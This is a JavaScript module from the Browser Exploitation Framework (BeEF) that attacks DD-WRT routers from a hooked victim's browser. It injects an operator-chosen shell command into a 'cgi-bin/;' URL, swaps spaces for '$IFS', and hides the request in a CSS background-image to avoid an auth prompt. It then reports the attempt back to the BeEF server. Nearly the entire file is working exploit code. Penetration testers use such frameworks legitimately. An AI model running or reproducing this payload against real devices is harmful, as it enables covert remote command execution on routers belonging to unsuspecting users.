27 lines
963 B
JavaScript
27 lines
963 B
JavaScript
//
|
|
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
var host = '<%= @host %>';
|
|
var cmd = '<%= @cmd %>';
|
|
var path = 'cgi-bin/;';
|
|
|
|
if (!host.match(/\/$/))
|
|
host += '/';
|
|
|
|
if (cmd.indexOf(' ') != -1)
|
|
cmd = cmd.replace(/\s+/g, '$IFS');
|
|
|
|
// Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe.
|
|
var ddwrt_div_<%= @command_id %> = document.createElement('div');
|
|
ddwrt_div_<%= @command_id %>.setAttribute('style', 'background-image: url("' + host + path + cmd + '")');
|
|
document.body.appendChild(ddwrt_div_<%= @command_id %>);
|
|
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
|
|
|
|
setTimeout(function() { document.body.removeChild(ddwrt_div_<%= @command_id %>) }, 15 * 1000);
|
|
});
|